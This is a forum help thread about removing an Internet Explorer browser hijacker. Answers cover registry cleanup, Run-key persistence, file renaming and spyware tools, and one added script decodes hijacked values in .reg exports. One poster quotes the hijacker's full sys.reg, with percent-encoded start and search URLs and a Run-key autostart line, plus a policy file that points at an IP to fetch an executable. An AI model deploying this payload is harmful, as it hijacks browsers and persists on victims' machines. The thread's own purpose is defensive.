datinfo
asked on
Unknown virus or malicious file
I have a serious problem. I believe I've been infected by something that seems to act like adware, a virus and a cookie at the same time. It makes my Internet Explorer run improperly. What it does is set my web homepage to freednshost.info, and every time I change it to another webpage, as soon as I close the program and open it again it's back to freednshost.info. Also, every time I click a link on any Internet webpage it sends me to that same page, freednshost.info, and I get some sort of search engine with an irritating little stick man dancing up and down on the page. This virus also puts unsolicited Internet Explorer shortcuts on my Active Desktop and it shows mortgage ads in my Options menu in Internet Explorer.
I've tried everything. I've scanned my computer. Looked for the infected file manually and I've downloaded the latest virus definitions for my Norton Antivirus but it doesn't seem to help.
What do I do?
Check these registry entries
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Search Bar
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Search Page
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page
HKCU\Software\Microsoft\Internet Explorer\SearchURL
HKCU\Software\Microsoft\Internet Explorer\Main\Default_Page_URL
HKCU\Software\Microsoft\Internet Explorer\Main\Default_Search_URL
HKCU\Software\Microsoft\Internet Explorer\Search\SearchAssistant
HKCU\Software\Microsoft\Internet Explorer\Search\CustomizeSearch
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\Search Bar
and remove freednshost.info. Before doing that, back up your registry.
ASKER
Thanks! That was really fast! I just posted the question! I honestly didn't expect such a fast answer!
datinfo,
> I honestly didn't expect such a fast answer!
You will be surprised every time you post .. Of course, I should be online. LOL !!
Thanks for the super fast feedback
Whoops,
You forgot the most important key of them all: the "RUN" keys.
(RUN/RUNONCE). In particular:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
If this has a value e.g.
sys REG_SZ "regedit -s sys.reg"
Delete this - and any other line that does not belong to anything you want to start.
Search the %WINDIR% directory for files recently updated - same with e.g. WINNT\system32. The last files updated should only be the Performance log files.
Your "sys.reg" is downloaded from a site that I am trying to find - the problem is that it first installs itself as an IE "Cookie" in the Temporary Internet Files - and then after a while it is moved. I had the following installed on February 26 - to wake up on April 17 at 19:40 - and slip through all virus scanners:
REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"HOMEOldSP"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"Search Bar"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
"Search Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"HOMEOldSP"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"Search Bar"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
"Search Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"PrivacyAdvanced"=dword:00000001
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"sys"="regedit -s sys.reg"
----------------
That is one. The other is
<?xml version="1.0"?>
<securitypolicy version="1">
<fwdebuglog debugflags="0x00000000" maxdebuglog="0"/>
<lockupinfo server="208.185.174.60" port="0" enable="true"/>
<startuphookafd wsockvermajor="0x00050000" wsockverminor="0x089319cb" enable="true"/>
<processes>
<process name="fssm32.exe" openprocessaction="allow">
<md5table>
<md5hex>91feb4e9-8cf1e8e5-4f6f306a-e1399374</md5hex>
<md5hex>2f856f29-4d155a8c-c4ebb124-3bfeb9d4</md5hex>
<md5hex>6ea475f6-d34c3c6d-7a8a6845-a525d6e6</md5hex>
</md5table>
</process>
</processes>
</securitypolicy>
...
- but where the IP address is a dead give-away: here ZoneLabs to fetch an executable.
Use Security Policy to avoid changes to the RUN keys - some tools like PortPro will guard the keys and notify before they are changed. The web pages are malicious - and most believe that viruses spread with mail attachments.
I have in another response recommended that all file names in "system32" be changed with e.g. 1st and 4th letter uppercase - rest lowercase. You make some convention that allows you to see in Taskman when an intrusion has been made - e.g. the fssm32.exe above would not be FssM32.exe - so KILL IT.
Make your own search page - distribute this - or force everyone to Google - then "Brand" IE - that inhibits all users from changing the search page, homepage and security settings.
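The two answers above list the registry locations to check (the Internet Explorer Main/Search values, and the Run keys) and quote the sys.reg that sets them. As an added example, not code from either poster, here is a small Python triage script that parses a REGEDIT4/.reg export (the text you get from `reg export`, or the sys.reg itself), decodes the percent-encoded URLs so the real hostname is visible, and lists every IE start/search value that does not point at a host you allow, plus every entry under a Run key for manual review. SAMPLE_REG is the sys.reg quoted above with the key paths repaired; `allowed_hosts` is a parameter of this example and not something from the thread.

```python
"""Triage a REGEDIT4 / .reg export for IE hijack values and Run entries.

Added example for this thread, not the posters' code. SAMPLE_REG is
constructed from the sys.reg quoted in the thread.
"""
import re
from urllib.parse import unquote, urlsplit

# Value names under Internet Explorer\Main and \Search that the thread lists
# as hijack targets (compared case-insensitively).
HIJACK_VALUES = {
    "start page", "homeoldsp", "search bar", "search page", "searchurl",
    "default_page_url", "default_search_url", "searchassistant",
    "customizesearch",
}
RUN_KEY_RE = re.compile(r"\\currentversion\\run(once)?$", re.IGNORECASE)
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"=(?P<raw>.*)$')

# Constructed sample: the sys.reg quoted above, key paths de-garbled.
SAMPLE_REG = r"""REGEDIT4
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"HOMEOldSP"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"Search Bar"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
"Search Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"HOMEOldSP"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%68%2E%70%68%70?%61%69%64=581"
"Search Bar"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
"Search Page"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Search]
"SearchAssistant"="http://%74%6B%67%69%70%6B%2E%74%2E%6D%75%78%61%2E%63%63/%73%2E%70%68%70?%61%69%64=581"
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"PrivacyAdvanced"=dword:00000001
[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"sys"="regedit -s sys.reg"
"""


def parse_reg(text):
    """Yield (key, value_name, raw_value) for each value line in a .reg dump.

    Default values (@=...) are skipped. 'Windows Registry Editor Version 5.00'
    exports are UTF-16LE; decode the file before passing its text here.
    """
    key = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = VALUE_RE.match(line)
        if key and m:
            yield key, m.group("name"), m.group("raw")


def decode_string(raw):
    """Return a REG_SZ value as text, resolving %XX escapes; None for non-strings."""
    if not (raw.startswith('"') and raw.endswith('"')):
        return None  # dword:, hex: and similar are not strings
    text = raw[1:-1].replace('\\"', '"').replace("\\\\", "\\")
    # The hijacker percent-encodes the hostname, so searching the .reg file
    # for the domain finds nothing; unquote() restores the readable URL.
    return unquote(text)


def triage(text, allowed_hosts=frozenset()):
    """Return (kind, key, value_name, decoded_value) findings.

    kind is "ie_hijack" for an IE start/search value whose host is not in
    allowed_hosts, or "run_entry" for any string value under a
    CurrentVersion\\Run or \\RunOnce key (listed for manual review).
    """
    findings = []
    for key, name, raw in parse_reg(text):
        value = decode_string(raw)
        if value is None:
            continue
        if name.lower() in HIJACK_VALUES:
            host = (urlsplit(value).hostname or "").lower()
            if host and host not in allowed_hosts:
                findings.append(("ie_hijack", key, name, value))
        elif RUN_KEY_RE.search(key):
            findings.append(("run_entry", key, name, value))
    return findings


def hijack_hosts(findings):
    """Distinct hosts the IE values were pointed at, ready for a whois lookup."""
    return sorted({urlsplit(f[3]).hostname for f in findings if f[0] == "ie_hijack"})


if __name__ == "__main__":
    results = triage(SAMPLE_REG)
    for kind, key, name, value in results:
        print(f"{kind:10} {key}\\{name} = {value}")
    print("hosts:", hijack_hosts(results))
```

Decoding first is what makes the hijacked host visible: the quoted sys.reg never contains the hostname in clear text, so a plain Find in Notepad for the domain comes up empty. hijack_hosts() gives the name to feed into the whois lookup suggested further down. If you export a live hive with `reg export "HKCU\Software\Microsoft\Internet Explorer" ie.reg`, open the file with encoding="utf-16" before passing its text to triage().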
I know I posted a virus.
But I believe in educating by real examples, not just mumbo jumbo talk.
Please beware - it is a virus that will set IE to search somewhere else.
IP address resolution:
See http://www.geektools.com/whois.php
It is good because it links in with the regional whois databases.
Another tool is the ID server found at www.grc.com - Steve Gibson's page.
I am not able to delete vsconfig.xml. It says the file is being used by another process. I restored my registry; how can I get rid of this vsconfig.xml?
Rename to e.g. vsconfig.xml.vir - designate open/edit of .vir to Notepad.
Delete *.vir next time you have rebooted the system.
This also allows you to rename files that you do not trust - and inhibit them from being loaded at boot-up. You can now inspect them with suitable tools - and if the file is e.g. part of the MS administrative tools, then you just rename the file back to vsconfig.xml...
Identify the files you have verified with a combination of uppercase/lowercase names.
E.g. to VscOnfig.xml - described in another posting - here first and fourth char in upper case.
Spyware/Adware removal tools:
--------------------------
What is spyware : http://www.spychecker.com/spyware.html
SpyBot-S&D : http://www.safer-networking.org/
Ad-aware : http://www.webattack.com/download/dladaware.shtml
CWShredder: http://www.softpedia.com/public/cat/10/17/10-17-150.shtml
HijackThis : http://www.spychecker.com/program/hijackthis.html
After installing them, first update them and then run them.